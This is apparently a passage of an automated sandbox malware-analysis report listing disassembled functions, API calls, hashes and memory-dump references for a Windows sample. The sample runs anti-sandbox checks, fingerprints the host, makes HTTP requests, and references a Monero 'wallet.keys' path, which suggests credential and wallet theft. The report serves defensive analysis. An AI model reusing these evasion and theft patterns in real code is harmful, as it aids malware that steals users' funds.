                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: 3b14a3861789d38619e7875102fc76480e408e8bc900efae580f7d2cc4d90b15
                              • Instruction ID: fb93b732c8cc1c9677fe2a56c8100b82a6dd313923d6e808c48c79960ef22587
                              • Opcode Fuzzy Hash: 3b14a3861789d38619e7875102fc76480e408e8bc900efae580f7d2cc4d90b15
                              • Instruction Fuzzy Hash: 79517DB8A04209EBCB44DFA1C954FBE77B6AF45704F10404EE40967361D778D952CB6A
                              Function 004C7500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1356 4c7500-4c754a GetWindowsDirectoryA 1357 4c754c 1356->1357 1358 4c7553-4c75c7 GetVolumeInformationA call 4c8d00 * 3 1356->1358 1357->1358 1365 4c75d8-4c75df 1358->1365 1366 4c75fc-4c7617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 4c75e1-4c75fa call 4c8d00 1365->1367 1369 4c7628-4c7658 wsprintfA call 4ca740 1366->1369 1370 4c7619-4c7626 call 4ca740 1366->1370 1367->1365 1377 4c767e-4c768e 1369->1377 1370->1377
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004C7542
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004C757F
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004C7603
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004C760A
                              • wsprintfA.USER32 ref: 004C7640
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                              • String ID: :$C$\$M
                              • API String ID: 1544550907-2588915378
                              • Opcode ID: eaa142da3af37b725ddae90fb7c92627cf393378eac78d77c8c6c78293922f93
                              • Instruction ID: 1669cc2cae9f9fbf2d409581fb67ebef50837b9eb9d46aa15e080a4c727f5f35
                              • Opcode Fuzzy Hash: eaa142da3af37b725ddae90fb7c92627cf393378eac78d77c8c6c78293922f93
                              • Instruction Fuzzy Hash: B14181B5D04248ABDB50DF94DC45FEEBBB8AF08714F10419DF509A7280DB78AA44CFA9
                              Function 004C69F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 004C9860: GetProcAddress.KERNEL32(76F70000,01180690), ref: 004C98A1
                                • Part of subcall function 004C9860: GetProcAddress.KERNEL32(76F70000,01180630), ref: 004C98BA
                                • Part of subcall function 004C9860: GetProcAddress.KERNEL32(76F70000,011806F0), ref: 004C98D2
                                • Part of subcall function 004C9860: GetProcAddress.KERNEL32(76F70000,011807B0), ref: 004C98EA
                                • Part of subcall function 004C9860: GetProcAddress.KERNEL32(76F70000,011806C0), ref: 004C9903
                                • Part of subcall function 004C9860: GetProcAddress.KERNEL32(76F70000,011889D8), ref: 004C991B
                                • Part of subcall function 004C9860: GetProcAddress.KERNEL32(76F70000,011767E0), ref: 004C9933
                                • Part of subcall function 004C9860: GetProcAddress.KERNEL32(76F70000,011768E0), ref: 004C994C
                                • Part of subcall function 004C9860: GetProcAddress.KERNEL32(76F70000,011806D8), ref: 004C9964
                                • Part of subcall function 004C9860: GetProcAddress.KERNEL32(76F70000,01180720), ref: 004C997C
                                • Part of subcall function 004C9860: GetProcAddress.KERNEL32(76F70000,01180750), ref: 004C9995
                                • Part of subcall function 004C9860: GetProcAddress.KERNEL32(76F70000,01180768), ref: 004C99AD
                                • Part of subcall function 004C9860: GetProcAddress.KERNEL32(76F70000,01176800), ref: 004C99C5
                                • Part of subcall function 004C9860: GetProcAddress.KERNEL32(76F70000,01180780), ref: 004C99DE
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                                • Part of subcall function 004B11D0: ExitProcess.KERNEL32 ref: 004B1211
                                • Part of subcall function 004B1160: GetSystemInfo.KERNEL32(?), ref: 004B116A
                                • Part of subcall function 004B1160: ExitProcess.KERNEL32 ref: 004B117E
                                • Part of subcall function 004B1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 004B112B
                                • Part of subcall function 004B1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 004B1132
                                • Part of subcall function 004B1110: ExitProcess.KERNEL32 ref: 004B1143
                                • Part of subcall function 004B1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004B123E
                                • Part of subcall function 004B1220: ExitProcess.KERNEL32 ref: 004B1294
                                • Part of subcall function 004C6770: GetUserDefaultLangID.KERNEL32 ref: 004C6774
                                • Part of subcall function 004B1190: ExitProcess.KERNEL32 ref: 004B11C6
                                • Part of subcall function 004C7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004B11B7), ref: 004C7880
                                • Part of subcall function 004C7850: RtlAllocateHeap.NTDLL(00000000), ref: 004C7887
                                • Part of subcall function 004C7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 004C789F
                                • Part of subcall function 004C78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004C7910
                                • Part of subcall function 004C78E0: RtlAllocateHeap.NTDLL(00000000), ref: 004C7917
                                • Part of subcall function 004C78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 004C792F
                                • Part of subcall function 004CA9B0: lstrlen.KERNEL32(?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004CA9C5
                                • Part of subcall function 004CA9B0: lstrcpy.KERNEL32(00000000), ref: 004CAA04
                                • Part of subcall function 004CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 004CAA12
                                • Part of subcall function 004CA8A0: lstrcpy.KERNEL32(?,004D0E17), ref: 004CA905
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01188AA8,?,004D110C,?,00000000,?,004D1110,?,00000000,004D0AEF), ref: 004C6ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004C6AE8
                              • CloseHandle.KERNEL32(00000000), ref: 004C6AF9
                              • Sleep.KERNEL32(00001770), ref: 004C6B04
                              • CloseHandle.KERNEL32(?,00000000,?,01188AA8,?,004D110C,?,00000000,?,004D1110,?,00000000,004D0AEF), ref: 004C6B1A
                              • ExitProcess.KERNEL32 ref: 004C6B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                              • String ID:
                              • API String ID: 2931873225-0
                              • Opcode ID: 0d9ca6ed4a00429c3d643191975976ebddc8da5d2a71e88c257102880acd4fe8
                              • Instruction ID: 8b1ee94051c128d5bdc0327fb70d8649dd69add18c0a27a4593c8df1419d2c73
                              • Opcode Fuzzy Hash: 0d9ca6ed4a00429c3d643191975976ebddc8da5d2a71e88c257102880acd4fe8
                              • Instruction Fuzzy Hash: 8B311CB8900108ABDB44FBE2DC56FEE7779AF04348F50451EF202A2191DF786915CABE
                              Function 004C6AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1436 4c6af3 1437 4c6b0a 1436->1437 1439 4c6b0c-4c6b22 call 4c6920 call 4c5b10 CloseHandle ExitProcess 1437->1439 1440 4c6aba-4c6ad7 call 4caad0 OpenEventA 1437->1440 1446 4c6ad9-4c6af1 call 4caad0 CreateEventA 1440->1446 1447 4c6af5-4c6b04 CloseHandle Sleep 1440->1447 1446->1439 1447->1437
                              APIs
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01188AA8,?,004D110C,?,00000000,?,004D1110,?,00000000,004D0AEF), ref: 004C6ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004C6AE8
                              • CloseHandle.KERNEL32(00000000), ref: 004C6AF9
                              • Sleep.KERNEL32(00001770), ref: 004C6B04
                              • CloseHandle.KERNEL32(?,00000000,?,01188AA8,?,004D110C,?,00000000,?,004D1110,?,00000000,004D0AEF), ref: 004C6B1A
                              • ExitProcess.KERNEL32 ref: 004C6B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                              • String ID:
                              • API String ID: 941982115-0
                              • Opcode ID: 0b384ce33052bc1f5ef86e823c8237398da12b642f7d527bac5d532fcc404365
                              • Instruction ID: 6ea4ed1a3d8d422d1954379ba8f05c7f31438746645994b8684cbbae549d4002
                              • Opcode Fuzzy Hash: 0b384ce33052bc1f5ef86e823c8237398da12b642f7d527bac5d532fcc404365
                              • Instruction Fuzzy Hash: 15F090B8900219AAE780EBA19C06F7E7B34EB04304F10841EB506A1180DBB92941D65B
                              Function 004B47B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004B4839
                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 004B4849
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1274457161-4251816714
                              • Opcode ID: 39be8ee56da0f799ed4027cef4d5ff6c41a0b2c26416f209df2660bb86246cab
                              • Instruction ID: 63b5bd6c7fe39c5d1d6157f486fe45f265f68ad30a21baa5a98a501126440dd5
                              • Opcode Fuzzy Hash: 39be8ee56da0f799ed4027cef4d5ff6c41a0b2c26416f209df2660bb86246cab
                              • Instruction Fuzzy Hash: ED2150B5D00208ABDF10EFA5E845BDE7779FB45310F108629F515A7280DB706609CB91
                              Function 004C51F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 004CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 004CA7E6
                                • Part of subcall function 004B6280: InternetOpenA.WININET(004D0DFE,00000001,00000000,00000000,00000000), ref: 004B62E1
                                • Part of subcall function 004B6280: StrCmpCA.SHLWAPI(?,0118E2D0), ref: 004B6303
                                • Part of subcall function 004B6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004B6335
                                • Part of subcall function 004B6280: HttpOpenRequestA.WININET(00000000,GET,?,0118DA58,00000000,00000000,00400100,00000000), ref: 004B6385
                                • Part of subcall function 004B6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004B63BF
                                • Part of subcall function 004B6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004B63D1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004C5228
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                              • String ID: ERROR$ERROR
                              • API String ID: 3287882509-2579291623
                              • Opcode ID: 0e10967da18628d65996e6ae60998a3c66cde4f7b889b2350e9b5f75234bb327
                              • Instruction ID: c11fc3febe75b6e5057bf35318b1f89b26d75b72f6186cfa854fccefbb2e6e19
                              • Opcode Fuzzy Hash: 0e10967da18628d65996e6ae60998a3c66cde4f7b889b2350e9b5f75234bb327
                              • Instruction Fuzzy Hash: 9F11213490000CA7CB54FF62DD52FED7378AF50308F90415EF81A46592EF38AB16CAAA
                              Function 004B1220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1493 4b1220-4b1247 call 4c89b0 GlobalMemoryStatusEx 1496 4b1249-4b1271 call 4cda00 * 2 1493->1496 1497 4b1273-4b127a 1493->1497 1499 4b1281-4b1285 1496->1499 1497->1499 1501 4b129a-4b129d 1499->1501 1502 4b1287 1499->1502 1503 4b1289-4b1290 1502->1503 1504 4b1292-4b1294 ExitProcess 1502->1504 1503->1501 1503->1504
                              APIs
                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004B123E
                              • ExitProcess.KERNEL32 ref: 004B1294
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 803317263-2766056989
                              • Opcode ID: b3b27d467f0b7957a7bee067ba53aed410b0da9d87782bfa3950d208e04e9530
                              • Instruction ID: bd97ba23fb1d8163ac84340cda6c390ee91dfa4f9be1ea5af91ffdf57d05b4ac
                              • Opcode Fuzzy Hash: b3b27d467f0b7957a7bee067ba53aed410b0da9d87782bfa3950d208e04e9530
                              • Instruction Fuzzy Hash: 27014FB0D40308AAEB14DBE0DC49BAEB778AB14705F60805AE605B6290D678654187AD
                              Function 008A49C0 Relevance: 4.6, APIs: 3, Instructions: 85registryCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 008A6EB5
                              • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 008A6EDC
                              • GetNativeSystemInfo.KERNEL32(?), ref: 008A6F33
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Open$InfoNativeSystem
                              • String ID:
                              • API String ID: 1247124224-0
                              • Opcode ID: 70b7360bcc6c48aaf9bdd7ecce73291c7616594ee733ba8388f036bc90dcfd4f
                              • Instruction ID: 687a68e948cd4fbccf46c72e666533d5332537c146145a8e1273b992e2e65fd1
                              • Opcode Fuzzy Hash: 70b7360bcc6c48aaf9bdd7ecce73291c7616594ee733ba8388f036bc90dcfd4f
                              • Instruction Fuzzy Hash: 403139B240424E9FFF11DF50C848BEE3AA8FB05B14F144025EA01C2D55E7B65CA8CB59
                              Function 004C78E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004C7910
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004C7917
                              • GetComputerNameA.KERNEL32(?,00000104), ref: 004C792F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: d9fd9838d87c20f18d09a4c9a10f8757e4fbbdcab4cfac84116e54d3b665372b
                              • Instruction ID: d50b3058b7adeb7b6ef82c084862ccf7184ee5d477b97d4fc05b3f0f6ca506f8
                              • Opcode Fuzzy Hash: d9fd9838d87c20f18d09a4c9a10f8757e4fbbdcab4cfac84116e54d3b665372b
                              • Instruction Fuzzy Hash: 290162F5944204EFD740DF98DD45FAABBB8F704B61F10422AE555A3380D37859008BA6
                              Function 004B1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 004B112B
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 004B1132
                              • ExitProcess.KERNEL32 ref: 004B1143
                              Memory Dump Source
